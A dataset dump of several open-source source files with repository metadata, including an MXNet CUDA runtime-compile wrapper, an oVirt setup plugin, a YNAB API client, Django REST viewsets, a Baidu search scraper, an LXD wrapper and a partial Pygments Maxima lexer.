2017-11-17T07:28:09.000Z
|
2019-07-23T06:24:16.000Z
|
python/mxnet/rtc.py
|
Najah-lshanableh/Deep_learning
|
4b8235bdacd319843dda7b331f207808e4a90a93
|
[
"Apache-2.0"
] | null | null | null |
python/mxnet/rtc.py
|
Najah-lshanableh/Deep_learning
|
4b8235bdacd319843dda7b331f207808e4a90a93
|
[
"Apache-2.0"
] | 2
|
2019-06-12T12:40:20.000Z
|
2020-11-03T14:33:14.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Interface to runtime cuda kernel compile module."""
from __future__ import absolute_import
import ctypes
from .base import _LIB, NDArrayHandle, RtcHandle, mx_uint, c_array, check_call
class Rtc(object):
"""MXRtc object in mxnet.
This class allows you to write CUDA kernels in Python
and call them with NDArray.
Parameters
----------
name : str
Name of the kernel.
inputs : tuple of (str, mxnet.ndarray)
List of input names and ndarray.
outputs : tuple of (str, mxnet.ndarray)
List of output names and ndarray.
kernel : str
The actual kernel code.
Note that this is only the body of the kernel, i.e.
after { and before }. Rtc will decorate the kernel.
For example, if ``name = "mykernel"`` and
inputs = [('x', mx.nd.zeros((10,)))]
outputs = [('y', mx.nd.zeros((10,)))]
kernel = "y[threadIdx.x] = x[threadIdx.x];",
then the compiled kernel will be:
extern "C" __global__ mykernel(float *x, float *y) {
const int x_ndim = 1;
const int x_dims = { 10 };
const int y_ndim = 1;
const int y_dims = { 10 };
y[threadIdx.x] = x[threadIdx.x];
}
"""
def __init__(self, name, inputs, outputs, kernel):
self.handle = RtcHandle()
input_names = ctypes.cast(c_array(ctypes.c_char_p, [i[0] for i in inputs]),
ctypes.POINTER(ctypes.c_char_p))
output_names = ctypes.cast(c_array(ctypes.c_char_p, [i[0] for i in outputs]),
ctypes.POINTER(ctypes.c_char_p))
input_nds = ctypes.cast(c_array(NDArrayHandle, [i[1].handle for i in inputs]),
ctypes.POINTER(NDArrayHandle))
output_nds = ctypes.cast(c_array(NDArrayHandle, [i[1].handle for i in outputs]),
ctypes.POINTER(NDArrayHandle))
check_call(_LIB.MXRtcCreate(ctypes.c_char_p(name),
mx_uint(len(inputs)),
mx_uint(len(outputs)),
input_names,
output_names,
input_nds,
output_nds,
ctypes.c_char_p(kernel),
ctypes.byref(self.handle)))
def __del__(self):
check_call(_LIB.MXRtcFree(self.handle))
def push(self, inputs, outputs, grid_dims, block_dims):
"""Run the kernel.
Parameters
----------
inputs : list of NDArray
List of inputs. Can contain different NDArrays than those used for the constructor,
but its elements must have the same shapes and appear in the same order.
outputs : list of NDArray
List of outputs. Can contain different ndarrays than used for the constructor,
but must have the same shapes and appear in the same order.
grid_dims : tuple of 3 uint
Grid dimension for kernel launch.
block_dims : tuple of 3 uint
Block dimension for kernel launch.
"""
input_nds = ctypes.cast(c_array(NDArrayHandle, [i.handle for i in inputs]),
ctypes.POINTER(NDArrayHandle))
output_nds = ctypes.cast(c_array(NDArrayHandle, [i.handle for i in outputs]),
ctypes.POINTER(NDArrayHandle))
check_call(_LIB.MXRtcPush(self.handle,
mx_uint(len(inputs)),
mx_uint(len(outputs)),
input_nds,
output_nds,
mx_uint(grid_dims[0]),
mx_uint(grid_dims[1]),
mx_uint(grid_dims[2]),
mx_uint(block_dims[0]),
mx_uint(block_dims[1]),
mx_uint(block_dims[2])))
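# Illustrative usage sketch (requires a CUDA-enabled MXNet build; values assumed):
# import mxnet as mx
# x = mx.nd.ones((10,), ctx=mx.gpu(0))
# y = mx.nd.zeros((10,), ctx=mx.gpu(0))
# rtc = Rtc("mykernel", [('x', x)], [('y', y)], "y[threadIdx.x] = x[threadIdx.x];")
# rtc.push([x], [y], (1, 1, 1), (10, 1, 1))  # one block of ten threads
# print(y.asnumpy())  # -> ten ones copied by the kernel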
| 45.018349
| 95
| 0.560016
|
5365252bc3441061bd5480afc3dcb18a728825e6
| 4,244
|
py
|
Python
|
packaging/setup/plugins/ovirt-engine-common/base/remote_engine/remote_engine_manual_files.py
|
UranusBlockStack/ovirt-engine
|
fe3c90ed3e74e6af9497c826c82e653382946ae1
|
[
"Apache-2.0"
] | null | null | null |
packaging/setup/plugins/ovirt-engine-common/base/remote_engine/remote_engine_manual_files.py
|
UranusBlockStack/ovirt-engine
|
fe3c90ed3e74e6af9497c826c82e653382946ae1
|
[
"Apache-2.0"
] | null | null | null |
packaging/setup/plugins/ovirt-engine-common/base/remote_engine/remote_engine_manual_files.py
|
UranusBlockStack/ovirt-engine
|
fe3c90ed3e74e6af9497c826c82e653382946ae1
|
[
"Apache-2.0"
] | null | null | null |
#
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2014-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gettext
import os
import tempfile
from otopi import plugin, util
from ovirt_engine_setup import constants as osetupcons
from ovirt_engine_setup import remote_engine_base
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
class _ManualFiles(remote_engine_base.RemoteEngineBase):
def __init__(self, plugin):
super(Plugin._ManualFiles, self).__init__(plugin=plugin)
self._plugin = plugin
self._tempfiles = []
@property
def plugin(self):
return self._plugin
@property
def dialog(self):
return self._plugin.dialog
@property
def environment(self):
return self._plugin.environment
@property
def logger(self):
return self._plugin.logger
@property
def name(self):
return osetupcons.Const.REMOTE_ENGINE_SETUP_STYLE_MANUAL_FILES
def desc(self):
return _(
'Perform each action manually, use files to copy content '
'around'
)
def configure(self, fqdn):
self._fqdn = fqdn
def execute_on_engine(self, cmd, timeout=60, text=None):
self.dialog.note(
text=text if text else _(
'Please run on the engine server:\n\n'
'{cmd}\n\n'
).format(
cmd=cmd
)
)
def copy_from_engine(self, file_name, dialog_name):
resfilename = self.dialog.queryString(
name=dialog_name,
note=_(
'Please copy {file_name} from the engine server to some '
'file here.\n'
'Please input the location of the local file where you '
'copied {file_name} from the engine server: '
).format(
file_name=file_name,
),
prompt=True,
)
with open(resfilename) as f:
res = f.read()
return res
def copy_to_engine(self, file_name, content, inp_env_key):
fname = self.environment.get(inp_env_key)
with (
open(fname, 'w') if fname
else tempfile.NamedTemporaryFile(mode='w', delete=False)
) as inpfile:
inpfile.write(content)
self.dialog.note(
text=_(
'Please copy {inpfile} from here to {file_name} on the '
'engine server.\n'
).format(
inpfile=inpfile.name,
file_name=file_name,
)
)
self._tempfiles.append(fname)
def cleanup(self):
for f in self._tempfiles:
if f is not None:
try:
# _tempfiles stores plain path strings, so unlink them directly
os.unlink(f)
except OSError:
self.logger.debug(
"Failed to delete '%s'",
f,
exc_info=True,
)
def __init__(self, context):
super(Plugin, self).__init__(context=context)
@plugin.event(
stage=plugin.Stages.STAGE_SETUP,
)
def _setup(self):
self.environment[
osetupcons.ConfigEnv.REMOTE_ENGINE_SETUP_STYLES
].append(
self._ManualFiles(
plugin=self,
)
)
# vim: expandtab tabstop=4 shiftwidth=4
| 29.472222
| 77
| 0.542884
|
e72f5bc0e759f4053138ce8a20675e9c783b8ace
| 9,572
|
py
|
Python
|
ynab_client/api/scheduled_transactions_api.py
|
Pezmc/ynab-client-python
|
6d154f3efecef6a5c3ff1cf89d8a2a59f9f7bb97
|
[
"Apache-2.0"
] | 4
|
2018-12-02T19:55:40.000Z
|
2021-02-28T13:13:45.000Z
|
ynab_client/api/scheduled_transactions_api.py
|
Pezmc/ynab-client-python
|
6d154f3efecef6a5c3ff1cf89d8a2a59f9f7bb97
|
[
"Apache-2.0"
] | 10
|
2018-07-22T06:52:16.000Z
|
2022-01-09T14:05:49.000Z
|
ynab_client/api/scheduled_transactions_api.py
|
Pezmc/ynab-client-python
|
6d154f3efecef6a5c3ff1cf89d8a2a59f9f7bb97
|
[
"Apache-2.0"
] | 10
|
2018-09-11T01:01:44.000Z
|
2022-01-09T13:54:50.000Z
|
# coding: utf-8
"""
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ynab_client.api_client import ApiClient
class ScheduledTransactionsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_scheduled_transaction_by_id(self, budget_id, scheduled_transaction_id, **kwargs): # noqa: E501
"""Single scheduled transaction # noqa: E501
Returns a single scheduled transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transaction_by_id(budget_id, scheduled_transaction_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:param str scheduled_transaction_id: The ID of the Scheduled Transaction. (required)
:return: ScheduledTransactionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_scheduled_transaction_by_id_with_http_info(budget_id, scheduled_transaction_id, **kwargs) # noqa: E501
else:
(data) = self.get_scheduled_transaction_by_id_with_http_info(budget_id, scheduled_transaction_id, **kwargs) # noqa: E501
return data
def get_scheduled_transaction_by_id_with_http_info(self, budget_id, scheduled_transaction_id, **kwargs): # noqa: E501
"""Single scheduled transaction # noqa: E501
Returns a single scheduled transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transaction_by_id_with_http_info(budget_id, scheduled_transaction_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:param str scheduled_transaction_id: The ID of the Scheduled Transaction. (required)
:return: ScheduledTransactionResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['budget_id', 'scheduled_transaction_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_scheduled_transaction_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'budget_id' is set
if ('budget_id' not in params or
params['budget_id'] is None):
raise ValueError("Missing the required parameter `budget_id` when calling `get_scheduled_transaction_by_id`") # noqa: E501
# verify the required parameter 'scheduled_transaction_id' is set
if ('scheduled_transaction_id' not in params or
params['scheduled_transaction_id'] is None):
raise ValueError("Missing the required parameter `scheduled_transaction_id` when calling `get_scheduled_transaction_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'budget_id' in params:
path_params['budget_id'] = params['budget_id'] # noqa: E501
if 'scheduled_transaction_id' in params:
path_params['scheduled_transaction_id'] = params['scheduled_transaction_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/budgets/{budget_id}/scheduled_transactions/{scheduled_transaction_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTransactionResponse', # noqa: E501
auth_settings=auth_settings,
is_async=params.get('is_async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_scheduled_transactions(self, budget_id, **kwargs): # noqa: E501
"""List scheduled transactions # noqa: E501
Returns all scheduled transactions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transactions(budget_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:return: ScheduledTransactionsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_scheduled_transactions_with_http_info(budget_id, **kwargs) # noqa: E501
else:
(data) = self.get_scheduled_transactions_with_http_info(budget_id, **kwargs) # noqa: E501
return data
def get_scheduled_transactions_with_http_info(self, budget_id, **kwargs): # noqa: E501
"""List scheduled transactions # noqa: E501
Returns all scheduled transactions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transactions_with_http_info(budget_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:return: ScheduledTransactionsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['budget_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_scheduled_transactions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'budget_id' is set
if ('budget_id' not in params or
params['budget_id'] is None):
raise ValueError("Missing the required parameter `budget_id` when calling `get_scheduled_transactions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'budget_id' in params:
path_params['budget_id'] = params['budget_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/budgets/{budget_id}/scheduled_transactions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTransactionsResponse', # noqa: E501
auth_settings=auth_settings,
            is_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
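# Illustrative usage sketch (not part of the generated client). The package,
# configuration and API class names below follow the generated SDK shown above
# but are assumptions here; substitute a real budget ID and access token.
#
# import ynab
#
# configuration = ynab.Configuration()
# configuration.api_key['Authorization'] = '<PERSONAL_ACCESS_TOKEN>'
# configuration.api_key_prefix['Authorization'] = 'Bearer'
# api = ynab.ScheduledTransactionsApi(ynab.ApiClient(configuration))
#
# response = api.get_scheduled_transactions('<BUDGET_ID>')
# for scheduled in response.data.scheduled_transactions:
#     print(scheduled.id, scheduled.date_next, scheduled.amount)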
| 41.081545
| 294
| 0.643962
|
14fc6f2abfd17641e1e0bc7d0033e17f9c61bbcd
| 1,152
|
py
|
Python
|
drf/drf_crud/app/views.py
|
taptorestart/python-backend-examples
|
0817223f403570f5822511c240726c6108d3b9b7
|
[
"MIT"
] | 7
|
2022-02-25T03:27:01.000Z
|
2022-03-22T10:51:13.000Z
|
drf/drf_crud/app/views.py
|
taptorestart/python-backend-examples
|
0817223f403570f5822511c240726c6108d3b9b7
|
[
"MIT"
] | null | null | null |
drf/drf_crud/app/views.py
|
taptorestart/python-backend-examples
|
0817223f403570f5822511c240726c6108d3b9b7
|
[
"MIT"
] | 1
|
2022-03-24T14:47:49.000Z
|
2022-03-24T14:47:49.000Z
|
from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from rest_framework import permissions
from app.serializers import UserSerializer, GroupSerializer, CategorySerializer, BeverageSerializer
from app.models import Category, Beverage
class UserViewSet(viewsets.ModelViewSet):
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
permission_classes = [permissions.IsAuthenticated]
class GroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all()
serializer_class = GroupSerializer
permission_classes = [permissions.IsAuthenticated]
class CategoryViewSet(viewsets.ModelViewSet):
queryset = Category.objects.all()
serializer_class = CategorySerializer
http_method_names = ['get', 'post', 'put', 'patch', 'delete', 'head']
permission_classes = [permissions.IsAuthenticated]
class BeverageViewSet(viewsets.ModelViewSet):
queryset = Beverage.objects.all()
serializer_class = BeverageSerializer
http_method_names = ['get', 'post', 'put', 'patch', 'delete', 'head']
permission_classes = [permissions.IsAuthenticated]
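# A minimal wiring sketch for these viewsets (this would live in the project's
# urls.py, not in views.py; the `app` import path is an assumption):
#
# from django.urls import include, path
# from rest_framework import routers
# from app import views
#
# router = routers.DefaultRouter()
# router.register(r'users', views.UserViewSet)
# router.register(r'groups', views.GroupViewSet)
# router.register(r'categories', views.CategoryViewSet)
# router.register(r'beverages', views.BeverageViewSet)
#
# urlpatterns = [
#     path('', include(router.urls)),
# ]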
| 36
| 99
| 0.773438
|
4fd33886c3fdafce581c2aa3e123cbef9dd16ba0
| 2,731
|
py
|
Python
|
python-博客网站内容爬取/PyCharm_article/com/article/spider/m_baidu.py
|
wangchuanli001/Project-experience
|
b563c5c3afc07c913c2e1fd25dff41c70533f8de
|
[
"Apache-2.0"
] | 12
|
2019-12-07T01:44:55.000Z
|
2022-01-27T14:13:30.000Z
|
python-博客网站内容爬取/PyCharm_article/com/article/spider/m_baidu.py
|
hujiese/Project-experience
|
b563c5c3afc07c913c2e1fd25dff41c70533f8de
|
[
"Apache-2.0"
] | 23
|
2020-05-23T03:56:33.000Z
|
2022-02-28T07:54:45.000Z
|
python-博客网站内容爬取/PyCharm_article/com/article/spider/m_baidu.py
|
hujiese/Project-experience
|
b563c5c3afc07c913c2e1fd25dff41c70533f8de
|
[
"Apache-2.0"
] | 7
|
2019-12-20T04:48:56.000Z
|
2021-11-19T02:23:45.000Z
|
# -*- coding: utf-8 -*-
import socket
import threading
import jieba
import requests
from bs4 import BeautifulSoup
import urllib.request
import random
import time
import sql_operation
import ast
import sys
import codecs
def page_html(keyword):
    print('\nCurrent keyword: ' + keyword)
    socket.setdefaulttimeout(10)  # set the global socket timeout (sample keywords: 学会php可以干什么, php是什么)
url = "http://m.baidu.com/s?word=" + keyword
user_agents = [
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 "]
user_agent = random.choice(user_agents)
headers = {
'User-Agent': user_agent,
'Accept-Encoding': 'gzip'}
try:
req = requests.get(url=url, headers=headers)
html_doc = req.text
soup = BeautifulSoup(html_doc, "html.parser")
titles = soup.select('article > header > div > a')
links = soup.select('span.c-color-gray')
# links2 = soup.select('div.c-showurl c-line-clamp1')
print("网页解析完毕")
page_list = []
php_list = ['php中文网', 'PHP中文网', 'm.php.cn']
for temp in titles:
# print(temp.get('aria-roledescription'), temp.get_text())
page_list.append(temp.get_text())
for temp in links:
page_list.append(temp.get_text())
# print(page_list)
for flag in php_list:
for temp in page_list:
if temp.find(flag) != -1:
print(keyword+" "+temp, ' ++++++++++++++++++++++++++++')
return False
return True
except Exception as e:
print(e)
print("重新进行尝试连接")
page_html(keyword)
def readfile():
fileio = open('keyword_relevant.txt', 'r+', encoding='utf-8')
keywords = fileio.read().split('\n')
php_list = []
fileio.seek(0, 0)
for keyword in keywords:
if page_html(keyword):
fileio.write(keyword + '\n')
else:
php_list.append(keyword)
if len(php_list) > 0:
for temp in php_list:
            fileio.write(temp + ' already on php中文网\n')
fileio.close()
if __name__ == '__main__': # php是什么
# page_html('php是什么')
readfile()
| 34.56962
| 144
| 0.586964
|
71bc65b20e9bba97fada7a826bc4cbe7dc2080bd
| 78
|
py
|
Python
|
sancus/lib/cogs/games/__init__.py
|
Solar-Productions/sancus
|
eb3c5c702bc5574c62b488c0e3bb06a36159e651
|
[
"Apache-2.0"
] | 1
|
2021-09-03T22:52:27.000Z
|
2021-09-03T22:52:27.000Z
|
sancus/lib/cogs/games/__init__.py
|
LunarDevelop/sancus
|
eb3c5c702bc5574c62b488c0e3bb06a36159e651
|
[
"Apache-2.0"
] | 1
|
2021-10-10T22:11:51.000Z
|
2021-10-10T22:11:51.000Z
|
sancus/lib/cogs/games/__init__.py
|
Solar-Productions/sancus
|
eb3c5c702bc5574c62b488c0e3bb06a36159e651
|
[
"Apache-2.0"
] | 1
|
2021-11-11T16:04:02.000Z
|
2021-11-11T16:04:02.000Z
|
from .games import Games
def setup(client):
client.add_cog(Games(client))
| 19.5
| 33
| 0.74359
|
54e5e3dd9be57419f29e832916ea7f8449b510b7
| 481
|
py
|
Python
|
conv_mechanics/tip.py
|
devinmcgloin/advent-term
|
96fd3ca408b3437518830e354ea3ccfa790fd191
|
[
"Apache-2.0"
] | null | null | null |
conv_mechanics/tip.py
|
devinmcgloin/advent-term
|
96fd3ca408b3437518830e354ea3ccfa790fd191
|
[
"Apache-2.0"
] | 38
|
2019-05-29T10:17:00.000Z
|
2020-02-20T05:35:41.000Z
|
conv_mechanics/tip.py
|
devinmcgloin/advent-term
|
96fd3ca408b3437518830e354ea3ccfa790fd191
|
[
"Apache-2.0"
] | null | null | null |
"""
utility functions to determine if a command is a tip or not.
"""
import re
is_tip_regex = re.compile(r"^tip *\$?(?:0|[1-9]\d{0,2}(?:,?\d{3})*)(?:\.\d+)?$")
amount_regex = re.compile(r"-?(?:0|[1-9]\d{0,2}(?:,?\d{3})*)(?:\.\d+)?$")
def is_tip(user_response):
if re.match(is_tip_regex, user_response) is not None:
return True
return False
def tip_amount(user_response):
    matches = re.findall(amount_regex, user_response)
    # strip thousands separators before converting, e.g. "1,000.50" -> 1000.5
    return max(float(match.replace(",", "")) for match in matches)
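# Minimal usage sketch for the helpers above (illustrative only).
if __name__ == "__main__":
    for response in ("tip $1,000.50", "tip 20", "no tip here"):
        if is_tip(response):
            print(response, "->", tip_amount(response))
        else:
            print(response, "-> not a tip")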
| 24.05
| 79
| 0.615385
|
f0440ee7e2ae41df976f5a4dfb451d768828056a
| 4,806
|
py
|
Python
|
src/benchmark/api/api_lxd.py
|
edvgui/LEPL2990-Benchmark-tool
|
be9bf7e62be215ec14ee5fddb91166bb8861090e
|
[
"MIT"
] | 3
|
2020-06-11T18:33:27.000Z
|
2021-02-21T13:48:06.000Z
|
src/benchmark/api/api_lxd.py
|
edvgui/LEPL2990-Benchmark-tool
|
be9bf7e62be215ec14ee5fddb91166bb8861090e
|
[
"MIT"
] | null | null | null |
src/benchmark/api/api_lxd.py
|
edvgui/LEPL2990-Benchmark-tool
|
be9bf7e62be215ec14ee5fddb91166bb8861090e
|
[
"MIT"
] | null | null | null |
import subprocess
import time
from exceptions.api_exception import ApiException
class LXCApiException(ApiException):
def __init__(self, message, trace):
super().__init__("LXD", message, trace)
def init(image, flags, log=False):
"""
Initialize a container from an image with the command 'lxc init'
:param image: The name of the image to create the container from
:param flags: Some flags to pass for the creation
:param log: Whether to display some logs or not
:return: The id of the created container, the command execution time
"""
args = ["lxc", "init", image]
args.extend(flags)
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to initiate container from image " + image,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return output.stdout.decode('utf-8').split(" ")[5].strip(), toc - tic
def start(container, log=False):
"""
Start a previously created container with the command 'lxc start'
:param container: The id of the created container
:param log: Whether to display some logs or not
:return: The command execution time
"""
args = ["lxc", "start", container]
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to start container " + container,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return toc - tic
def exec(container, command, log=False):
"""
Execute a command in a running container with the command 'lxc exec'
:param container: The id of the container in which execute the command
:param command: The command to execute
:param log: Whether to display some logs or not
:return: The output of the execution, the command execution time
"""
args = ["lxc", "exec", container, "--"]
args.extend(command)
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to execute command '{0}' in container {1}".format(command, container),
output.stderr.decode('utf-8').strip())
if log:
print(output)
return output.stdout.decode('utf-8'), toc - tic
def launch(image, options, log=False):
"""
Build and start a new container with the command 'lxc launch'
:param image: The image to build the container from
:param options: The options to give for the launch
:param log: Whether to display some logs or not
:return: The id of the launched container, the command execution time
"""
args = ["lxc", "launch", image]
args.extend(options)
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to launch container from image " + image,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return output.stdout.decode('utf-8').split(" ")[6].strip(), toc - tic
def kill(container, log=False):
"""
Stop a running container with the command 'lxc stop'
:param container: The id of the container to stop
:param log: Whether to display some logs or not
:return: The command execution time
"""
args = ["lxc", "stop", "--force", container]
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to stop container " + container,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return toc - tic
def rm(container, log=False):
"""
Remove a stopped container with the command 'lxc rm'
:param container: The id of the container to remove
:param log: Whether to display some logs or not
:return: The command execution time
"""
args = ["lxc", "rm", container]
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to remove container " + container,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return toc - tic
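# Illustrative lifecycle sketch for the wrappers above. It assumes a working
# local LXD installation and an available image alias ("ubuntu:20.04" here is
# an assumption); timings are in seconds.
if __name__ == "__main__":
    container, launch_time = launch("ubuntu:20.04", [])
    try:
        stdout, exec_time = exec(container, ["echo", "hello from lxd"])
        print("launch: %.2fs, exec: %.2fs, output: %s"
              % (launch_time, exec_time, stdout.strip()))
    finally:
        kill(container)
        rm(container)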
| 36.687023
| 120
| 0.644611
|
2151d16e4ba443ed253c42ec4900aa5ed92328b2
| 2,709
|
py
|
Python
|
pygments/lexers/maxima.py
|
blu-base/pygments
|
da799d14818ed538bf937684a19ce779ddde9446
|
[
"BSD-2-Clause"
] | 1
|
2015-06-08T14:52:49.000Z
|
2015-06-08T14:52:49.000Z
|
pygments/lexers/maxima.py
|
blu-base/pygments
|
da799d14818ed538bf937684a19ce779ddde9446
|
[
"BSD-2-Clause"
] | 1
|
2022-03-13T09:17:24.000Z
|
2022-03-13T09:18:02.000Z
|
pygments/lexers/maxima.py
|
blu-base/pygments
|
da799d14818ed538bf937684a19ce779ddde9446
|
[
"BSD-2-Clause"
] | null | null | null |
"""
pygments.lexers.maxima
~~~~~~~~~~~~~~~~~~~~~~
Lexer for the computer algebra system Maxima.
Derived from pygments/lexers/algebra.py.
:copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
__all__ = ['MaximaLexer']
class MaximaLexer(RegexLexer):
"""
A `Maxima <http://maxima.sourceforge.net>`_ lexer.
Derived from pygments.lexers.MuPADLexer.
.. versionadded:: 2.11
"""
name = 'Maxima'
aliases = ['maxima', 'macsyma']
filenames = ['*.mac', '*.max']
keywords = ('if', 'then', 'else', 'elseif',
'do', 'while', 'repeat', 'until',
'for', 'from', 'to', 'downto', 'step', 'thru')
constants = ('%pi', '%e', '%phi', '%gamma', '%i',
'und', 'ind', 'infinity', 'inf', 'minf',
'true', 'false', 'unknown', 'done')
operators = (r'.', r':', r'=', r'#',
r'+', r'-', r'*', r'/', r'^',
r'@', r'>', r'<', r'|', r'!', r"'")
operator_words = ('and', 'or', 'not')
tokens = {
'root': [
(r'/\*', Comment.Multiline, 'comment'),
(r'"(?:[^"\\]|\\.)*"', String),
(r'\(|\)|\[|\]|\{|\}', Punctuation),
(r'[,;$]', Punctuation),
(words (constants), Name.Constant),
(words (keywords), Keyword),
(words (operators), Operator),
(words (operator_words), Operator.Word),
(r'''(?x)
((?:[a-zA-Z_#][\w#]*|`[^`]*`)
(?:::[a-zA-Z_#][\w#]*|`[^`]*`)*)(\s*)([(])''',
bygroups(Name.Function, Text.Whitespace, Punctuation)),
(r'''(?x)
(?:[a-zA-Z_#%][\w#%]*|`[^`]*`)
(?:::[a-zA-Z_#%][\w#%]*|`[^`]*`)*''', Name.Variable),
